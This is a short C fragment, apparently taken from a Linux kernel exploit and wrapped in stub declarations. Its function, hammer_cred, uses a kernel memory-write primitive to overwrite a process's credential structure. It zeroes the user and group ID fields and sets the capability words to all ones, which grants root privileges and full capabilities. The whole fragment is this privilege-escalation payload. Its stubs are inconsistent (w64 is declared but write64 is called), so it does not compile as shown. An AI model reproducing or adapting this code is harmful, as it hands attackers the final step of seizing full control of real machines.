
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int msg (char*,unsigned long) ;
 int read64 (unsigned long) ;
 int w64 (int) ;

__attribute__((used)) static void
hammer_cred(unsigned long addr) {
 msg("hammering cred structure at %llx\n", addr);

 unsigned long val = read64(addr) & 0xFFFFFFFFUL;
 { write64(addr, (val)); addr += 8; };
 { write64(addr, (0)); addr += 8; }; { write64(addr, (0)); addr += 8; }; { write64(addr, (0)); addr += 8; }; { write64(addr, (0)); addr += 8; };
 { write64(addr, (0xFFFFFFFFFFFFFFFF)); addr += 8; };
 { write64(addr, (0xFFFFFFFFFFFFFFFF)); addr += 8; };
 { write64(addr, (0xFFFFFFFFFFFFFFFF)); addr += 8; };

}
